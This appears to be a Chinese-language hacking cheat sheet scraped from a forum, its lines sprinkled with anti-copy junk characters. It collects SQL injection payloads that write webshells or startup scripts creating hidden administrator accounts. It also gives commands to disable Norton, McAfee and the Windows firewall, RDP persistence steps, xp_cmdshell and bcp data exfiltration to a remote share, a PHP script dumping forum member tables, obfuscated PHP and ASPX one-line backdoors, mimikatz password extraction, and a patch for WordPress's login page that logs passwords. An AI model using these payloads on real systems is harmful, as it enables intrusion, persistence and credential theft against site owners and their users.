第二步:用netstat -ano命令,列出所有端口对应的PID值! ' K9 l0 ?: {1 c/ |8 Q- ~
   找到PID值所对应的端口
# P! ~% b# Q) O2 _/ A$ N8 w. B2 j5 ^2 |) t0 x& C/ i9 k, g; K
查询sql server 2005中的密码hash% [+ R" g2 ]  b+ W. H
SELECT password_hash FROM sys.sql_logins where name='sa'; t. t. j  f/ H! a; b
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a- z; A1 z0 e, T- |: y) G$ `
access中导出shell% G/ X* n% |  w  y/ y4 J

5 Q! G5 q; D9 Z; b' v3 N  D中文版本操作系统中针对mysql添加用户完整代码:& J+ F/ g1 B# _9 m% r0 ~

$ Y4 Y) }; y* H4 F! K1 c/ q/ T7 Zuse test;
, t, ]7 P. ~' kcreate table a (cmd text);
2 ~( ?7 a$ X. |, \7 n5 H; oinsert into a values ("set wshshell=createobject (""wscript.shell"") " );: Q4 p1 i) W  {; C! K. s
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
6 I) j$ ]' S& w/ C7 C, Finsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );; g0 `; M+ \& s; {
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
, e4 q' f( I- I/ r4 i$ F9 c9 @6 ~drop table a;
1 ?  Y3 t9 E- o; x, T" \. m8 {+ t* q; U4 e2 ]1 e( r* d4 i2 }. i7 W
英文版本:6 E: c& R$ ~; j4 `6 t' ~( U
" n/ e) N5 v1 {. a4 z  ~8 _3 ]
use test;
9 d! G3 i3 y+ @create table a (cmd text);0 i/ b0 t8 w3 [" J" e
insert into a values ("set wshshell=createobject (""wscript.shell"") " );, @1 g( Z  ~- |; l. R: [4 w; E# [
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
. t, N+ m, X; t* Y# w& }% B% einsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
# h3 e# R# z8 C5 W% e. d2 n  lselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
9 R2 |3 k  j3 d3 d, vdrop table a;3 I$ d0 D: K# A

; `( M  S4 y. ]  Mcreate table a (cmd BLOB);0 s6 g5 M6 u, a, R* ?4 ~
insert into a values (CONVERT(木马的16进制代码,CHAR));6 K& K3 y. M; h8 A0 G. J
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'8 l# e7 A% h6 z; y
drop table a;
' t) k2 k* z0 H
5 \0 R4 [  i# g% `5 d" _& s% B3 g记录一下怎么处理变态诺顿# o9 L/ B! Y7 N2 \2 ?) x/ }( }' B
查看诺顿服务的路径
' L  u8 E7 o3 p; |% hsc qc ccSetMgr
9 R8 L% F+ Q1 I% J0 d6 `然后设置权限拒绝访问。做绝一点。。
7 C% h6 y) G; V" i+ Y& t8 Y1 k' jcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
% V& k  s7 G5 Z3 `5 lcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"% w8 J; k+ t. Q; d$ Z
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators  L- s. p: Z3 L
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
- i4 ^& _6 ^' s- S* `8 Q1 k2 u9 O- ]2 C2 U4 S3 N8 z- [( S% X
然后再重启服务器- ~/ h) N. E5 Y2 `) {& |! x' ~
iisreset /reboot
, E1 {2 M* J7 \# X; ^这样就搞定了。。不过完事后。记得恢复权限。。。。
9 C" j% w: v9 |9 b- A7 w+ @/ ecacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F" T! F4 t: A" z) _5 N
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F! q$ E% U; ~; B5 T+ {
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F5 z" M; I( C' b, k2 Y9 s
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
/ D4 o$ Z# z' C/ ], g1 eSELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
$ E2 u+ j) g" o. R2 |/ z0 @3 s- F
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
0 p+ c4 {% b+ m& o  u- J$ {7 C; }& Z7 Q+ ~$ X5 U
postgresql注射的一些东西1 o! O( @4 d9 `. i
如何获得webshell# u- F& j1 e( f- A
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
8 K" T5 L- W3 r5 L$ }1 Nhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); : S) l9 P6 t5 n) G! ~7 D
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;7 T1 f* F4 G3 o( a. s' D0 u' o
如何读文件9 s* B, D7 N' _4 a
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
- D) y( ]; X- U# Thttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;/ |) x! F; Y; F1 A2 h- J+ z
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
  A. }9 V5 U) X& Z. b
, B- f/ m/ X' \z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。- D7 g5 l" s* h4 S+ v2 V
当然,这些的postgresql的数据库版本必须大于8.X+ l' V1 X3 J& C* {% i
创建一个system的函数:" ^, ?. R; E. M: r6 v) D8 w
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; w0 q- ]( |/ Q( A3 [0 G

# P( K) Q! w2 n' x创建一个输出表:) s- {/ C3 u3 U7 P
CREATE TABLE stdout(id serial, system_out text)
# `' o9 z4 b1 l7 g9 h% r! O# `$ S
) b2 B) f$ Q: L& E, Y$ i执行shell,输出到输出表内:$ R0 r4 x: l7 f2 v
SELECT system('uname -a > /tmp/test')
$ b" L- [( Z  y  o, a$ Z7 w; j! s- f3 O
; V- t' l3 \6 v) k! H% pcopy 输出的内容到表里面;! f& v9 p) m4 F, D
COPY stdout(system_out) FROM '/tmp/test'
6 K5 b9 ^, m$ t- I. W! j* }! |
2 E; v( j+ Z+ e5 i; R从输出表内读取执行后的回显,判断是否执行成功* T' P8 g8 M1 [# X  z! O

; Q% Q. k( ~' ?. }+ p  y8 ^+ W6 {SELECT system_out FROM stdout; X, W# Y# S! ^8 |6 |7 e
下面是测试例子4 ]. Y6 o; H7 e; p
4 M2 H3 D& a3 O# B8 B0 X3 y
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 8 z+ _) D3 o: ~6 |" g" _

/ P" K9 e8 c, g4 t* A& P: x- }/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
) O+ k- m0 }# J0 `# S3 nSTRICT --
$ n0 e8 B2 b/ i. F' D$ B
4 R8 n$ J6 {, o' P6 c! s, r/store.php?id=1; SELECT system('uname -a > /tmp/test') --+ T, k! u8 o$ {) g1 c" r( A& |
8 `# e7 a' T$ ~
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --( Z  O& Z0 X: x% H
' b) ]8 {% [& [, {) R4 k
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--' Y' r, Q' d$ u& H; g
net stop sharedaccess    stop the default firewall. M5 I( U/ y% S2 Z( w
netsh firewall show      show/config default firewall+ |5 M) S1 c% `' q) ]& p  o
netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall
: t1 ]/ O) J* s/ b, o  j& M0 b' V# Nnetsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall3 n8 N" O: [- O+ C
修改3389端口方法(修改后不易被扫出)
, l, t7 s/ Z& W' J修改服务器端的端口设置,注册表有2个地方需要修改
$ g. [+ [+ @0 h; a
) ?& J1 R) K) O[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
( N2 P1 P  t$ i5 i$ |PortNumber值,默认是3389,修改成所希望的端口,比如6000* [- g8 n5 |# f+ {% @& n9 i3 ?

8 J" U  T( b/ l: Y' j第二个地方:/ A" i  Y4 ?. G0 @6 M( T
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 
2 A% x1 O- h% v, p+ A& _PortNumber值,默认是3389,修改成所希望的端口,比如6000. O+ x+ z2 Q" ~
8 K3 X3 m6 y, s: N5 L
现在这样就可以了。重启系统就可以了
8 m5 M+ z) ]9 r7 x# o
  a$ f7 C/ l& W! i查看3389远程登录的脚本
/ P6 a+ n% V% _- F保存为一个bat文件
, N9 B5 M' F4 z; K" @- O) E5 ]date /t >>D:\sec\TSlog\ts.log
- Y# ^: Z& F" c& z( }5 dtime /t >>D:\sec\TSlog\ts.log
/ V/ F4 p5 u$ Pnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log3 @7 q1 D! c) ]: D/ D8 U
start Explorer
6 [0 t' e* ]$ e
3 R: s0 K) c; r- ?! Pmstsc的参数:
4 I$ O8 ?! X4 ?' \- m# \0 s& I* U+ T( h, I
远程桌面连接
! ^4 w- z2 [1 w: F2 R
! |0 m# {, h9 L/ pMSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]3 q1 B% y6 X& C
  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?3 C$ S' m" H+ Q  ^

6 @& a# ^2 M$ c9 o- A<Connection File> -- 指定连接的 .rdp 文件的名称。
( s5 F' s; T  h0 s! l3 U, V+ J( \2 r/ u3 D& C. Z
/v:<server[:port]> -- 指定要连接到的终端服务器。  [# T! F( K9 X1 q
+ o1 ]4 i% j* a# [; |
/console -- 连接到服务器的控制台会话。' ?1 P1 @  x( N+ y1 Q, s$ D

1 M6 `; G3 Q0 r% }: i$ G/f -- 以全屏模式启动客户端。
' Z# r, }4 U  K4 D
- w5 ^* B. j; u/w:<width> --  指定远程桌面屏幕的宽度。
  {: T; {! G1 F/ y( U
  [% H" U* ?, Y/h:<height> -- 指定远程桌面屏幕的高度。* \, x" S% p8 R9 v. @, D% c

  R: L! h) F8 S# G7 y$ o! f/edit -- 打开指定的 .rdp 文件来编辑。! k% |; ?5 J$ w1 [- `0 ]. H* Z

" x2 I6 v5 `: B6 l/migrate -- 将客户端连接管理器创建的旧版$ b) o  O, @' `
连接文件迁移到新的 .rdp 连接文件。; @, D2 q& y1 S- o& u' \

5 e1 K. R( {- I
+ ?2 K. E' i3 ~其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就9 N4 S& v$ f+ @, F
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量5 H$ q: d# M5 e

+ G0 Y2 q3 m$ o( k+ D6 C; s0 \9 _+ p命令行下开启3389
2 a% ^( e( J: C# U) Znet user asp.net aspnet /add
2 ^6 C( _4 ^! {  ?! d& fnet localgroup Administrators asp.net /add
9 d0 h4 @. t( V! U  i3 g2 {net localgroup "Remote Desktop Users" asp.net /add1 X/ {2 e( p# s% u
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
5 F  u; M; I$ `$ J: R+ o$ lecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0; z" X0 @7 B5 s% I( q4 a7 `- c
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 14 L& x8 i. }$ p6 {0 J
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
/ c- m# O7 t; V( n$ @5 @/ h' n5 dsc config rasman start= auto  l+ {6 g( p2 C4 ~1 g
sc config remoteaccess start= auto- \" P0 S3 ^( q
net start rasman+ Z! @# j/ j  }" z
net start remoteaccess
" \2 j' S0 [# N0 A! A. N  PMedia& R  d' |  G1 s+ s( U6 Z
<form id="frmUpload" enctype="multipart/form-data"
8 z5 y/ Z: Y2 ~action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>$ e$ N  l7 G8 q) p' l
<input type="file" name="NewFile" size="50"><br>  J5 }0 i; E) j- T; }: N
<input id="btnUpload" type="submit" value="Upload">
1 R% s* h9 {) Y' e</form>) G6 x  o3 v: {4 [! ]

$ w# b3 L2 O* d. H( M& ncontrol userpasswords2 查看用户的密码
! q; T. @2 ^- V. ^8 v( caccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径* S$ j! O4 j: Z0 L1 M& X
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
, F( n9 C8 R( {* X, ?9 ?3 p0 p/ a
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
& ^4 s) k' v/ C5 u3 p/ a5 |测试1:' F  E- J1 X- q0 _; `6 r
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
. E2 O+ Z! L/ o% B* n8 W3 C# L8 J  o- }% ]+ n5 ?
测试2:! w) D; r) [' C+ ~" W0 @6 d. o
$ g/ @. E8 e( g2 W
create table dirs(paths varchar(100),paths1 varchar(100), id int)
  z  j) [5 j) P! B+ x2 w1 f7 F2 h% w; U
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
/ L/ Y' @  U& `8 q$ f5 o
1 ~/ f: G. V4 O6 l1 @) SSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
5 M5 g1 t) l$ o6 p* u) h  `2 t* v7 v关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
2 \2 r) u- Q) e- J可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;& O/ o5 |5 X1 @2 O
net stop mcafeeframework
0 C& P+ f& i- G( g# P5 ]: Hnet stop mcshield  |2 ^8 r; I- C& L4 P8 a6 Q
net stop mcafeeengineservice; l' E! a3 ~  v
net stop mctaskmanager
9 j* f% Z& u8 B" H! \4 d; f. s) y" Dhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D0 v! p* y  R. |+ j# v

. `! d! X4 I0 r  VNCDump.zip (4.76 KB, 下载次数: 1)
2 |5 M, [- ~4 E# a  A密码在线破解http://tools88.com/safe/vnc.php
& Y+ F" I  h6 q! l0 K. eVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
' D- Y( f. j: J1 Z/ z+ }1 Y' a9 o5 X8 n  }  h
exec master..xp_cmdshell 'net user'6 E: |0 e: z2 z- }! x
mssql执行命令。9 n% {7 j1 s. }! Z! }" Q4 y
获取mssql的密码hash查询" n5 O; j3 E& ?  M) g
select name,password from master.dbo.sysxlogins
% g: Y2 Q2 h' r" ]$ m& q- |* M: C. y: f5 g/ v' P/ w
backup log dbName with NO_LOG;6 P& F5 {5 m4 S5 A$ q$ `
backup log dbName with TRUNCATE_ONLY;7 f: u6 O. G8 s/ @. x
DBCC SHRINKDATABASE(dbName);% m6 U0 F5 l3 y! V$ t
mssql数据库压缩
  U8 d; }: g  E" G( x* y( B  r8 ]& f# a9 ]/ y! y! }" e2 K
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
1 [* Z" h( M; |% W, ^0 B# m5 y1 b将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。* I4 G0 Y! S3 i

0 D$ D, d0 n6 m: c" N6 pbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
9 o' a% b! G# g! `8 m备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
. S  |0 F! q8 _
4 t7 D* V2 `* |" S; _2 ?Discuz!nt35渗透要点:
1 H6 T8 E, G6 k, q0 t(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
0 y0 Y: `- h$ e) q' j(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
" Y  N4 J" ]6 k& L  A( Q(3)保存。
7 d6 |: e9 ?: C. H6 O# l, J' m(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass" `. Y& i6 }0 |! v
d:\rar.exe a -r d:\1.rar d:\website\
: U: L- {' {6 U- z递归压缩website( Y' M, Z! D6 F' ~+ z
注意rar.exe的路径- o! D, O' b! f5 B/ B( o
0 b8 v2 d2 k- e9 F
<?php
2 F4 u, ^: k* W3 p$ j: P* V
4 q+ `9 l& n4 g: a' Z0 b$telok   = "0${@eval($_POST[xxoo])}";
0 r* ]. R! P3 |' |' h% n3 k7 x
+ i  d% D5 O$ m" J8 H; t: {$username   = "123456";; B! y- H  Y9 t* h# q
: R4 S7 n7 \! ^6 M8 i
$userpwd   = "123456";1 x0 A/ y4 L9 i0 E, Z

  U+ b! ]0 g) \% ~$telhao   = "123456";# f& M* `" b$ q. G

$ @3 @7 j! @" C, F7 J( k! }( `$telinfo   = "123456";# j' M7 k. I' V7 V. c

8 d$ F0 I5 x" x3 u?>
7 }0 {  f9 b& O: J" R; p5 H" G7 ?% r  bphp一句话未过滤插入一句话木马
  T" g0 g  l: I* z5 D+ y( o) A2 @& i  a2 R! N/ p
站库分离脱裤技巧
* ^. v$ w# G% G8 b- @6 A/ Y- oexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'+ L4 b$ e9 ^6 }1 f
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'5 c7 E* {' E9 b( ?2 g) u
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
; j6 p6 [9 a. d* s  k7 D  B这儿利用的是马儿的专家模式(自己写代码)。8 ]! T3 Q: r, w5 n- c
ini_set('display_errors', 1);9 X! V9 R- \$ _: a' m- p$ S) a
set_time_limit(0);% L4 D1 F6 V/ f: M) S3 ~7 H7 u. a8 w
error_reporting(E_ALL);* ^3 d1 C& N6 e) G0 Z3 h
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());4 R$ h' U& d+ j  \) i; Y( ?
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
9 B5 q3 ?* x) S& n6 }8 u$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
5 H2 _; }# a. {& g$i = 0;' E+ _' f. W! x+ l/ b/ \; L  |( \$ f
$tmp = '';/ W: [1 @0 e. q# D6 S: K; S
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
( ?3 J+ v7 A7 H' K. R, S4 c; R  A    $i = $i+1;
$ n8 K6 z: B4 m    $tmp .=  implode("::", $row)."\n";
( P3 @- E/ e% j: R2 v' I    if(!($i%500)){//500条写入一个文件* Y  c' V! P7 b+ S/ l
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
5 _  W/ ^+ J6 H8 b2 |( q  M# d        file_put_contents($filename,$tmp);$ b8 A' D" _4 E5 y7 e3 P- G
        $tmp = '';
/ Q( Y/ n) t6 d3 e    }$ S; |. U3 ~* i8 a: G5 q/ s
}
6 @7 o, T8 {4 o9 z7 |9 C& nmysql_free_result($result);9 q" a$ H9 B  q2 ?" b# O

0 Y. S2 O0 J. n4 n, T: Z" S" e: V1 j( l: a- U

9 O+ _/ M5 X5 {! H& M+ J7 c1 g//down完后delete* n) ^1 ?4 X8 a, K

, a) _& N: L% R# l7 K, O* O: J  x0 @% z* u  N% E- V
ini_set('display_errors', 1);
; T% V8 c7 P$ C  w4 _/ h- merror_reporting(E_ALL);9 L2 \( s* H, P) U, ]9 l+ D
$i = 0;. m7 a+ Q  B4 r% @' q8 j
while($i<32) {
$ m) e: q& y, Y) s4 Z+ J% ~    $i = $i+1;
2 I7 v& c$ u; L0 ~* p" N        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';% L. j& y- V" e  i
        unlink($filename);
& g$ w, X6 m7 _}
0 y" V2 |" J1 m% X2 v, Ghttprint 收集操作系统指纹0 w, r# [2 s; c
扫描192.168.1.100的所有端口
+ ?; y* T& t7 f6 knmap –PN –sT –sV –p0-65535 192.168.1.100
( W. k: F1 b  k$ W4 D9 Rhost -t ns www.owasp.org 识别的名称服务器,获取dns信息, h7 e) X( k/ T+ u3 @( D2 _
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输4 W; M0 a% c! i7 n) u/ _
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
+ o3 y# Y, @( T' ~, H6 @+ H( _- G! e. Y# \3 L0 k  D2 |
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
  y: a; a- F; v, T& w$ I5 D, [
5 P+ p% I( S& W  w  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
  v$ r! E  b; j& ?% Q
7 B, Y' a/ N/ G: e% H+ M) W  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
4 |) c# ^0 n# ^- ]/ Q. n' k
) u1 L, S* o5 A" O' D  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)9 ~/ m* }, v# l/ |: }
* R' Q( ^2 n) t$ ~: T; v4 }
  http://net-square.com/msnpawn/index.shtml (要求安装)
+ S# B) B/ Z! N# Y. p8 i: }9 |! s! D+ k6 d8 X" E2 I
  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)8 q  r/ Z8 P% h6 S0 A
$ [' r3 H0 R/ F$ i
  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)/ N/ b1 |; p, q. y  _- O1 w7 E
set names gb2312
7 _  H0 c% f! N& Y! y导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。! s1 y6 }* e6 m; B% v
1 }( x$ g% Z+ w# I8 c6 m
mysql 密码修改/ ^" q: }9 Y9 r& i
UPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ” 7 ]; |8 P2 X, ?% E( N) J( Y% _1 v
update user set password=PASSWORD('antian365.com') where user='root';  ^! f. C) I/ _! L2 z: J* ]: i
flush privileges;
4 s* K4 R( g9 p# x$ R+ O, e高级的PHP一句话木马后门
2 g& \* C5 d% c9 z  P2 u3 K8 K
0 \- s" I0 X3 S0 S; D$ d" s) Z入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
% E3 R- N- u/ l7 C5 H3 c
2 C7 }$ Z; z+ m9 T1、
& \- C. U1 @7 N! q7 s' e2 v8 i* R- \- f! x+ d$ \
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";! O7 o; d/ l# x/ n5 Y: {- r3 y

2 x, v+ Q0 U2 \' d$hh("/[discuz]/e",$_POST['h'],"Access");$ `2 M9 O* U+ m; ~

6 ]3 C3 }9 G1 D; i4 k1 r( R//菜刀一句话
! l: C, M8 U( o0 r# W) w2 z# B3 ]; T  \0 E# M
2、6 s# |! @' c& }8 ^

) O3 i" `& d- F; K8 n$filename=$_GET['xbid'];
: @- E3 A0 @3 Z* }+ v' y0 r/ {2 u' X! T2 r# c) Q9 ~) f
include ($filename);( H$ b3 \2 s1 Q
- Q5 z5 s& _* A7 p: _5 c5 K
//危险的include函数,直接编译任何文件为php格式运行
$ y8 |$ R, [3 t1 K; _5 W. h9 S1 _4 y2 G/ Z3 z, W8 M* `
3、
/ o4 u8 L1 G. @2 _9 P. V9 F: ]9 C, e' Z, `5 v0 A' z+ R
$reg="c"."o"."p"."y";4 m' }" H- X0 G  C: I: L
/ `  B, Y. i9 \8 x( e  l
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);! R! E! ~+ g7 K: b4 c. H8 a! ]; R

! @$ q! [6 F7 |! D1 r//重命名任何文件, e# E3 b7 q# o
+ {- H( I# B5 R
4、0 }" Z1 Y) u: l9 I  N( P. E

3 n" b# @2 ~- p$ D, @$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";8 }2 e" l0 ~5 Z, W! b

( M& O; x2 Y: V$gzid("/[discuz]/e",$_POST['h'],"Access");
6 u. a9 c. H# L# h' b( q+ [
, f, w4 O2 e" i2 W$ s//菜刀一句话' a% V' Y6 n, e- i+ C  [
9 `2 C) ]* T  ]: G" N$ P  D* q0 a. r
5、include ($uid);* D/ x: v7 m; u& S
/ i. D" l4 F+ {5 H$ H" ]- X. @1 q( m! E
//危险的include函数,直接编译任何文件为php格式运行,POST
8 {  Y  \! I: K1 B: q. @1 g2 }8 W! K* x) C8 k3 V# |0 U0 \: [

; l+ Q  C5 A6 G8 S* G+ X& W//gif插一句话
" {, x$ {# G$ |! q. {( [  L# O0 [9 J0 Y6 C. `
6、典型一句话, k2 R5 p& m6 S1 ^: L( \! j% O
' m* w( v% b9 o+ Y# Q
程序后门代码% L0 |* l7 J* R( ?
<?php eval_r($_POST[sb])?>. X; H0 a2 x8 |, H1 L% D1 S" q. d
程序代码& ^% I" D" D9 ?& `9 g6 w7 s" A
<?php @eval_r($_POST[sb])?>$ H7 B1 c  R; B! O: t8 V
//容错代码
% ], Y) L; A& D2 B程序代码$ f' e5 c' N5 [2 y" G
<?php assert($_POST[sb]);?>
% F; C; c+ W- i; {: J' ^//使用lanker一句话客户端的专家模式执行相关的php语句8 v/ B( {5 O0 l7 M4 L
程序代码
; [- {2 @9 f: L<?$_POST['sa']($_POST['sb']);?>
% S6 s& x: f5 V程序代码) f( D4 s% z3 n5 a$ I
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>8 ], k) w) A2 l+ _# @7 s
程序代码8 N  F- w/ n9 n  }( i
<?php$ {1 t, g" ~4 v
@preg_replace("/[email]/e",$_POST['h'],"error");' L. w+ V* J" R; k5 n) Y; r
?>
' c6 N( b4 b+ h  p# B//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入' t" m5 B8 c+ Z7 I0 b0 L! K  E
程序代码# f' k4 |+ S* I3 M
<O>h=@eval_r($_POST[c]);</O>
' X, K. c1 G4 F+ P" _0 n) Q6 x程序代码
. C0 i4 x9 J, [3 q: x& L- g( V+ U<script language="php">@eval_r($_POST[sb])</script>9 K( `5 A8 E( d
//绕过<?限制的一句话. O" }6 A- k' W- u

3 N7 `( k) ~4 k6 i% F, Yhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip+ m& W  H, j9 @" S+ i; I
详细用法:
4 M% ?  i( i- b7 a7 J/ ?1、到tools目录。psexec \\127.0.0.1 cmd
' f5 H/ v- r- o" x* O2、执行mimikatz# q' q. p# W7 i; J/ u
3、执行 privilege::debug
6 c& Y3 b2 A& g( p8 c4、执行 inject::process lsass.exe sekurlsa.dll# Z1 z, m+ |  T4 s) u$ g  B
5、执行@getLogonPasswords
# r/ t: w, l5 q' R: ~% o7 w6、widget就是密码
, b" v" H1 T6 h/ |4 l7、exit退出,不要直接关闭否则系统会崩溃。; m; W) E3 P$ I% g1 I" f
6 Y# n8 a7 c, q/ l% h1 o) V1 y" @
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
, B0 }; c. G/ d  w$ l- p0 s& `& D. \
自动查找系统高危补丁5 \! o# n8 ]# j4 @7 D0 B! z. K& ~
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
: j" W# Y4 U9 `5 D( c& p5 g9 B, T7 W  l1 j- P) t
突破安全狗的一句话aspx后门
8 _" ~2 j( [/ B4 P8 _3 A/ J<%@ Page Language="C#" ValidateRequest="false" %>& v( B5 s8 q: n* R
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%># P" r3 b. r5 t( z) ]$ N
webshell下记录WordPress登陆密码6 e' b* L# r8 B6 @
webshell下记录Wordpress登陆密码方便进一步社工
, u9 M% u! e$ ^) t) K2 A' X在文件wp-login.php中539行处添加:/ M7 ~0 }9 p! U% @8 P0 R
// log password0 H& |1 l% |2 \& y
$log_user=$_POST['log'];7 m0 c1 F$ _2 X/ S% U
$log_pwd=$_POST['pwd'];
4 [) c8 n5 j& h, u) M/ r$log_ip=$_SERVER["REMOTE_ADDR"];  B! p4 s' u4 K. [" ^& g9 o( L; M; c
